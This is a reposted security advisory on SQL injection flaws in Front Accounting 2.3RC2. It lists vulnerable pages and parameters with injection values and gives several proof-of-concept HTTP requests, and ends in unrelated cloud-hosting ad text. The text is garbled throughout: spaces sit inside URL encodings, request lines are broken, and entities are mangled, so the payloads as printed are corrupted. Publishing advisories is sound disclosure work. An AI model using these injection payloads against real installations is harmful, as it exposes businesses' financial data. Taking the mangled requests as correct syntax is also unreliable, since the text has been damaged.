Front Accounting (FA) is a professional web page Accounting system. Front Accounting 2.3RC2 has multiple SQL injection vulnerabilities, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
Advisory Name: Multiple SQL Injections in Front Accounting
Internal Cybsec Advisory Id: 2010-1003-Multiple SQL Injections in Front Accounting
Vulnerability Class: SQL Injection
Affected Applications: Front Accounting v2.3RC2; other versions may also be affected.
Affected Platforms: Any running Front Accounting v2.3RC2
Local/Remote: Remote
Severity: High-CVSS 6.3 (AV: N/AC: M/Au: S/C: C/I: N/A: N)
Researcher: Juan Manuel Garcia
Vulnerability Description:
Multiple vulnerabilities has been discovered in Front Accounting, which can be exploited by attackers
To conduct SQL injection attacks.
At least the following parameters are not properly sanitized:
Http://xxx.xxx.xxx.xxx/admin/fiscalyears.php
The attacker can set parameter from_dates value to 01% 2F01% 2F2008% 27% 3B
Http://xxx.xxx.xxx.xxx/dimensions/dimension_entry.php
The attacker can set parameter refs value to 1234% 27% 3B
The attacker can set parameter trans_nos value to 31% 20 having % 201 = 1 --
Http://xxx.xxx.xxx.xxx/dimensions/view/view_dimension.php
The attacker can set parameter trans_nos value to 3;
Http://xxx.xxx.xxx.xxx/gl/bank_account_reconcile.php
The attacker can set parameter reconcile_dates value to 1234% 27% 3B
Http://xxx.xxx.xxx.xxx/gl/inquiry/balance_sheet.php
The attacker can set parameter TransToDates value to 1234% 27 + having + 1% 3D1 --
Http://xxx.xxx.xxx.xxx/gl/inquiry/bank_inquiry.php
Http://xxx.xxx.xxx.xxx/gl/inquiry/gl_account_inquiry.php
Http://xxx.xxx.xxx.xxx/gl/inquiry/gl_trial_balance.php
Http://xxx.xxx.xxx.xxx/gl/inquiry/profit_loss.php
Http://xxx.xxx.xxx.xxx/gl/inquiry/tax_inquiry.php
The attacker can set parameter TransToDates value to 1234% 27 + having + 1% 3D1 --
The attacker can set parameter TransToDates value to 1234% 27% 3B
Http://xxx.xxx.xxx.xxx/gl/inquiry/journal_inquiry.php
The attacker can set parameter FromDates value to 1234% 27% 3B
The attacker can set parameter Memos value to 1234% 27% 3B
The attacker can set parameter Refs value to 1234% 27% 3B
The attacker can set parameter ToDates value to 1234% 27% 3B
Http://xxx.xxx.xxx.xxx/inventory/inquiry/stock_movements.php
The attacker can set parameter AfterDates value to 1234% 27% 3B
The attacker can set parameter BeforeDates value to 1234% 27% 3B
Http://xxx.xxx.xxx.xxx/manufacturing/work_order_add_finished.php
The attacker can set parameter refs value to 1234% 27% 3B
The attacker can set parameter selected_ids value to 181 + having + 1% 3D1 --
The attacker can set parameter trans_nos value to 181% 20 having % 201 = 1 --
Http://xxx.xxx.xxx.xxx/manufacturing/work_order_issue.php
The attacker can set parameter IssueTypes value to 1% 29 + having + 1% 3D1 --
The attacker can set parameter Locations value to SH % 27% 3B
The attacker can set parameter WorkCentres value to 1% 27% 3B
The attacker can set parameter _ focuss value to _ stock_id_edit % 27% 3B
The attacker can set parameter _ stock_id_edits value to % 27% 3B
The attacker can set parameter _ stock_id_updates value to + % 27% 3B
The attacker can set parameter date_s value to 1234% 27% 3B
The attacker can set parameter memo_s value to 1234% 27% 3B
The attacker can set parameter qtys value to 1234% 27% 3B
The attacker can set parameter refs value to 1234% 27% 3B
The attacker can set parameter std_costs value to 1234% 27 + having + 1% 3D1 --
The attacker can set parameter stock_ids value to Business1 % 27% 3B
The attacker can set parameter trans_nos value to 181% 20 having % 201 = 1 --
Http://xxx.xxx.xxx.xxx/purchasing/po_receive_items.php
The attacker can set parameter PONumbers value to 351% 20 having % 201 = 1 --
Http://xxx.xxx.xxx.xxx/purchasing/supplier_credit.php
The attacker can set parameter invoice_nos value to 21;
The attacker can set parameter receive_begins value to 1234% 27% 3B
The attacker can set parameter receive_ends value to 1234% 27 + having + 1% 3D1 --
Http://xxx.xxx.xxx.xxx/reporting/prn_redirect.php
The attacker can set parameter PARAM_1s value to 361% 20 having % 201 = 1 --
Http://xxx.xxx.xxx.xxx/sales/customer_credit_invoice.php
The attacker can set parameter InvoiceNumbers value to 106;
Other parameters might also be affected.
[+] Poc:
~~~~~~~~~
Some Proof of Concepts:
* Http://xxx.xxx.xxx.xxx/dimensions/dimension_entry.php? Trans_no =
PoC:
GET/dimensions/dimension_entry.php? Trans_no = 31% 20 having % 201 = 1 -- HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d = cbe43b3ad36c2622030f8b1093144916
Accept :*/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx. xxx
Referer: http://xxx.xxx.xxx.xxx/dimensions/inquiry/search_dimensions.php
* Http://xxx.xxx.xxx.xxx/purchasing/allocations/supplier_allocate.php? Trans_no = 11 & trans_type =
PoC:
GET/purchasing/allocations/supplier_allocate.php? Trans_no = 11 & trans_type = 11% 20 having % 201 = 1 --
HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d = 2aa6f7cc954528a151a5f5d6c658f418
Accept :*/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx. xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/allocations/supplier_allocation_main.php
* Http://xxx.xxx.xxx.xxx/purchasing/po_receive_items.php? PONumber =
PoC:
GET/purchasing/po_receive_items.php? PONumber = 351% 20 having % 201 = 1 -- HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d = 2aa6f7cc954528a151a5f5d6c658f418
Accept :*/*
Accept-Language: en-Us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx. xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/inquiry/po_search.php
* Http://xxx.xxx.xxx.xxx/purchasing/supplier_credit.php? New = 1 & invoice_no =
PoC:
GET/purchasing/supplier_credit.php? New = 1 & invoice_no = 21; HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d = 2aa6f7cc954528a151a5f5d6c658f418
Accept :*/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx. xxx
Referer: http://xxx.xxx.xxx.xxx/purchasing/inquiry/supplier_inquiry.php
* Http://xxx.xxx.xxx.xxx/reporting/prn_redirect.php? PARAM_0 = 36 & PARAM_1 = 3
PoC:
GET/reporting/prn_redirect.php? PARAM_0 = 36 & amp; PARAM_1 = 361% 20 having % 201 = 1 --
& Amp; PARAM_2 = & amp; PARAM_3 = 0 & amp; PARAM_4 = & amp; REP_ID = 111 HTTP/1.0
Cookie: FA4649d6f070639b67129c222b2094650d = a3101d91a3ae6ede3e0ab57f90c03b79
Accept :*/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: xxx. xxx
Referer: http://xxx.xxx.xxx.xxx/sales/inquiry/sales_orders_view.php? Type = 32
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15565
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
